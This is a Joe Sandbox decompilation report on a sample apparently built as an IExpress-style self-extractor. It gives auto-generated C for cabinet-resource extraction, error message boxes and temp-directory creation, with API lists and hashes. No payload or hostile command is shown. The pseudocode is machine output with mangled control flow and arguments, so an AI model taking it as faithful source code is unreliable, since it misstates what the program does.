                                                                                                                                                                                                      • API String ID: 4237285672-0
                                                                                                                                                                                                      • Opcode ID: a10915e9769a6a47613e2cc318209af14e7b08968fd29586171a1eadf983690a
                                                                                                                                                                                                      • Instruction ID: 8d3a2e2dd1ce24738ef3e8cac10b4db44b19b4e8e04f17e860468bd3a4252ded
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a10915e9769a6a47613e2cc318209af14e7b08968fd29586171a1eadf983690a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5771D1B1A0028CAFEB65DB21CCC5BFB77ACEB48745F1444A9F505B6181EB349E848B21
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 374 e4fe0-e501a call e468f FindResourceA LoadResource LockResource 377 e5020-e5027 374->377 378 e5161-e5163 374->378 379 e5029-e5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 e5057-e505e call e4efd 377->380 379->380 383 e507c-e50b4 380->383 384 e5060-e5077 call e44b9 380->384 389 e50e8-e5104 call e44b9 383->389 390 e50b6-e50da 383->390 388 e5107-e510e 384->388 392 e511d-e511f 388->392 393 e5110-e5117 FreeResource 388->393 398 e5106 389->398 390->398 402 e50dc 390->402 395 e513a-e5141 392->395 396 e5121-e5127 392->396 393->392 400 e515f 395->400 401 e5143-e514a 395->401 396->395 399 e5129-e5135 call e44b9 396->399 398->388 399->395 400->378 401->400 404 e514c-e5159 SendMessageA 401->404 405 e50e3-e50e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E000E4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				struct HWND__* _t9;
                                                                                                                                                                                                      				int _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      				struct HWND__* _t27;
                                                                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				CHAR* _t36;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				intOrPtr _t47;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t36 = "CABINET";
                                                                                                                                                                                                      				 *0xe9144 = E000E468F(_t36, 0, 0);
                                                                                                                                                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                      				 *0xe9140 = _t8;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t9 =  *0xe8584; // 0x0
                                                                                                                                                                                                      				if(_t9 != 0) {
                                                                                                                                                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                      					ShowWindow(GetDlgItem( *0xe8584, 0x841), 5);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t10 = E000E4EFD(0, 0);
                                                                                                                                                                                                      				if(_t10 != 0) {
                                                                                                                                                                                                      					__imp__#20(E000E4CA0, E000E4CC0, E000E4980, E000E4A50, E000E4AD0, E000E4B60, E000E4BC0, 1, 0xe9148, _t33);
                                                                                                                                                                                                      					_t34 = _t10;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						_t29 =  *0xe9148; // 0x0
                                                                                                                                                                                                      						_t24 =  *0xe8584; // 0x0
                                                                                                                                                                                                      						E000E44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#22(_t34, "*MEMCAB", 0xe1140, 0, E000E4CD0, 0, 0xe9140); // executed
                                                                                                                                                                                                      					_t37 = _t10;
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#23(_t34); // executed
                                                                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 =  *0xe8584; // 0x0
                                                                                                                                                                                                      					E000E44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_t12 =  *0xe9140; // 0x0
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						FreeResource(_t12);
                                                                                                                                                                                                      						 *0xe9140 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						_t47 =  *0xe91d8; // 0x0
                                                                                                                                                                                                      						if(_t47 == 0) {
                                                                                                                                                                                                      							E000E44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(( *0xe8a38 & 0x00000001) == 0 && ( *0xe9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                      						SendMessageA( *0xe8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t37;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}
















                                                                                                                                                                                                      0x000e5070
                                                                                                                                                                                                      0x000e5075
                                                                                                                                                                                                      0x000e5107
                                                                                                                                                                                                      0x000e5107
                                                                                                                                                                                                      0x000e510e
                                                                                                                                                                                                      0x000e5111
                                                                                                                                                                                                      0x000e5117
                                                                                                                                                                                                      0x000e5117
                                                                                                                                                                                                      0x000e511f
                                                                                                                                                                                                      0x000e5121
                                                                                                                                                                                                      0x000e5127
                                                                                                                                                                                                      0x000e5135
                                                                                                                                                                                                      0x000e5135
                                                                                                                                                                                                      0x000e5127
                                                                                                                                                                                                      0x000e5141
                                                                                                                                                                                                      0x000e5159
                                                                                                                                                                                                      0x000e5159
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e515f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 000E4FFE
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 000E5006
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 000E500D
                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 000E5030
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 000E5037
                                                                                                                                                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 000E504A
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 000E5051
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 000E5111
                                                                                                                                                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 000E5159
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                      • API String ID: 1305606123-2642027498
                                                                                                                                                                                                      • Opcode ID: 95230e9cfdb0235169a2f436799eaff9ec6fca985ae71185f4fb260647927be4
                                                                                                                                                                                                      • Instruction ID: c14aeb2ce019a6e6faf4207b07d1ad4e21de4178bf6dd4c4cd944ad9d7d2fb1e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95230e9cfdb0235169a2f436799eaff9ec6fca985ae71185f4fb260647927be4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F83105B17407C16FF7205B63ADC9F67369CA709F5AF0444A8FA05BE2E1DABC9C008661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 406 e44b9-e44f8 407 e44fe-e4525 LoadStringA 406->407 408 e4679-e467b 406->408 409 e4527-e452e call e681f 407->409 410 e4562-e4568 407->410 411 e467c-e468c call e6ce0 408->411 418 e453f 409->418 419 e4530-e453d call e67c9 409->419 414 e456b-e4570 410->414 414->414 417 e4572-e457c 414->417 420 e457e-e4580 417->420 421 e45c9-e45cb 417->421 425 e4544-e4554 MessageBoxA 418->425 419->418 419->425 426 e4583-e4588 420->426 423 e45cd-e45cf 421->423 424 e4607-e4617 LocalAlloc 421->424 428 e45d2-e45d7 423->428 429 e455a-e455d 424->429 430 e461d-e4628 call e1680 424->430 425->429 426->426 431 e458a-e458c 426->431 428->428 433 e45d9-e45ed LocalAlloc 428->433 429->411 437 e462d-e463d MessageBeep call e681f 430->437 432 e458f-e4594 431->432 432->432 435 e4596-e45ad LocalAlloc 432->435 433->429 436 e45f3-e4605 call e171e 433->436 435->429 439 e45af-e45c7 call e171e 435->439 436->437 444 e464e 437->444 445 e463f-e464c call e67c9 437->445 439->437 448 e4653-e4677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E000E44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                                      				char _v576;
                                                                                                                                                                                                      				void* _v580;
                                                                                                                                                                                                      				struct HWND__* _v584;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                                                                      				intOrPtr _t58;
                                                                                                                                                                                                      				intOrPtr _t59;
                                                                                                                                                                                                      				int _t64;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				intOrPtr* _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                                                                      				intOrPtr* _t77;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                      				intOrPtr* _t84;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t75 = __edx;
                                                                                                                                                                                                      				_t34 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                      				_v584 = __ecx;
                                                                                                                                                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                      				_t67 = _a4;
                                                                                                                                                                                                      				_t69 = 0xd;
                                                                                                                                                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                      				_v580 = _t37;
                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                      				if(( *0xe8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      					_t39 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_v576 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xe9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                      					if(_v576 != 0) {
                                                                                                                                                                                                      						_t73 =  &_v576;
                                                                                                                                                                                                      						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                      						_t75 = _t16;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t43 =  *_t73;
                                                                                                                                                                                                      							_t73 = _t73 + 1;
                                                                                                                                                                                                      						} while (_t43 != 0);
                                                                                                                                                                                                      						_t84 = _v580;
                                                                                                                                                                                                      						_t74 = _t73 - _t75;
                                                                                                                                                                                                      						if(_t84 == 0) {
                                                                                                                                                                                                      							if(_t67 == 0) {
                                                                                                                                                                                                      								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                      								_t83 = _t27;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t75 = _t83;
                                                                                                                                                                                                      									_t74 = _t80;
                                                                                                                                                                                                      									E000E1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t76 = _t67;
                                                                                                                                                                                                      								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                      								_t85 = _t24;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t55 =  *_t76;
                                                                                                                                                                                                      									_t76 = _t76 + 1;
                                                                                                                                                                                                      								} while (_t55 != 0);
                                                                                                                                                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                      								_t83 = _t25 + _t74;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E000E171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t77 = _t67;
                                                                                                                                                                                                      							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                      							_t81 = _t18;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t58 =  *_t77;
                                                                                                                                                                                                      								_t77 = _t77 + 1;
                                                                                                                                                                                                      							} while (_t58 != 0);
                                                                                                                                                                                                      							_t75 = _t77 - _t81;
                                                                                                                                                                                                      							_t82 = _t84 + 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t59 =  *_t84;
                                                                                                                                                                                                      								_t84 = _t84 + 1;
                                                                                                                                                                                                      							} while (_t59 != 0);
                                                                                                                                                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                      							_t80 = _t44;
                                                                                                                                                                                                      							if(_t80 == 0) {
                                                                                                                                                                                                      								goto L6;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_push(_v580);
                                                                                                                                                                                                      								E000E171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                      								MessageBeep(_a12);
                                                                                                                                                                                                      								if(E000E681F(_t67) == 0) {
                                                                                                                                                                                                      									L25:
                                                                                                                                                                                                      									_t49 = 0x10000;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t54 = E000E67C9(_t74, _t74);
                                                                                                                                                                                                      									_t49 = 0x190000;
                                                                                                                                                                                                      									if(_t54 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                      								_t83 = _t52;
                                                                                                                                                                                                      								LocalFree(_t80);
                                                                                                                                                                                                      								_t39 = _t52;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(E000E681F(_t67) == 0) {
                                                                                                                                                                                                      							L4:
                                                                                                                                                                                                      							_t64 = 0x10010;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t66 = E000E67C9(0, 0);
                                                                                                                                                                                                      							_t64 = 0x190010;
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								goto L4;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x000e458f
                                                                                                                                                                                                      0x000e4591
                                                                                                                                                                                                      0x000e4592
                                                                                                                                                                                                      0x000e459b
                                                                                                                                                                                                      0x000e459e
                                                                                                                                                                                                      0x000e45a3
                                                                                                                                                                                                      0x000e45a9
                                                                                                                                                                                                      0x000e45ad
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e45af
                                                                                                                                                                                                      0x000e45af
                                                                                                                                                                                                      0x000e45bf
                                                                                                                                                                                                      0x000e462d
                                                                                                                                                                                                      0x000e4630
                                                                                                                                                                                                      0x000e463d
                                                                                                                                                                                                      0x000e464e
                                                                                                                                                                                                      0x000e464e
                                                                                                                                                                                                      0x000e463f
                                                                                                                                                                                                      0x000e4640
                                                                                                                                                                                                      0x000e4647
                                                                                                                                                                                                      0x000e464c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e464c
                                                                                                                                                                                                      0x000e4666
                                                                                                                                                                                                      0x000e466d
                                                                                                                                                                                                      0x000e466f
                                                                                                                                                                                                      0x000e4675
                                                                                                                                                                                                      0x000e4675
                                                                                                                                                                                                      0x000e45ad
                                                                                                                                                                                                      0x000e4527
                                                                                                                                                                                                      0x000e452e
                                                                                                                                                                                                      0x000e453f
                                                                                                                                                                                                      0x000e453f
                                                                                                                                                                                                      0x000e4530
                                                                                                                                                                                                      0x000e4531
                                                                                                                                                                                                      0x000e4538
                                                                                                                                                                                                      0x000e453d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e453d
                                                                                                                                                                                                      0x000e4554
                                                                                                                                                                                                      0x000e455a
                                                                                                                                                                                                      0x000e455a
                                                                                                                                                                                                      0x000e455a
                                                                                                                                                                                                      0x000e4525
                                                                                                                                                                                                      0x000e468c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                      • MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 000E45A3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 000E45E3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 000E460D
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 000E4630
                                                                                                                                                                                                      • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 000E4666
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 000E466F
                                                                                                                                                                                                        • Part of subcall function 000E681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 000E686E
                                                                                                                                                                                                        • Part of subcall function 000E681F: GetSystemMetrics.USER32(0000004A), ref: 000E68A7
                                                                                                                                                                                                        • Part of subcall function 000E681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000E68CC
                                                                                                                                                                                                        • Part of subcall function 000E681F: RegQueryValueExA.ADVAPI32(?,000E1140,00000000,?,?,0000000C), ref: 000E68F4
                                                                                                                                                                                                        • Part of subcall function 000E681F: RegCloseKey.ADVAPI32(?), ref: 000E6902
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                      • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                      • API String ID: 3244514340-2605220145
                                                                                                                                                                                                      • Opcode ID: 4b0c90f4b885b6ea75eda9a3939922189ac8485df6770875e64bc6309facccc4
                                                                                                                                                                                                      • Instruction ID: 53ed77820de4823dd136d9bcd9cd03b7353bc920e4524d05b9cde2a1e8cce9e9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b0c90f4b885b6ea75eda9a3939922189ac8485df6770875e64bc6309facccc4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35511672A00295AFDB219F29DC48BFA7BA8EF46700F044195FD49B7242DB36DD05CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E000E53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				long _t13;
                                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                                      				CHAR* _t20;
                                                                                                                                                                                                      				int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				CHAR* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                      				_t32 = __edx;
                                                                                                                                                                                                      				_t20 = __ecx;
                                                                                                                                                                                                      				_t29 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E000E171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                      					_t34 = _t34 + 0x10;
                                                                                                                                                                                                      					_t29 = _t29 + 1;
                                                                                                                                                                                                      					E000E1680(_t32, 0x104, _t20);
                                                                                                                                                                                                      					E000E658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                      					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                      					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t29 < 0x190) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t30 = 0;
                                                                                                                                                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                      						_t30 = 1;
                                                                                                                                                                                                      						DeleteFileA(_t32);
                                                                                                                                                                                                      						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return E000E6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t30 = 1;
                                                                                                                                                                                                      				 *0xe8a20 = 1;
                                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E171E: _vsnprintf.MSVCRT ref: 000E1750
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E53FB
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5402
                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E541F
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E542B
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5434
                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5452
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                      • API String ID: 1082909758-2966903483
                                                                                                                                                                                                      • Opcode ID: d4dd0d71d06a4f7193cf99c4215b7674d26c5af521d2262887fd0de5704b3f18
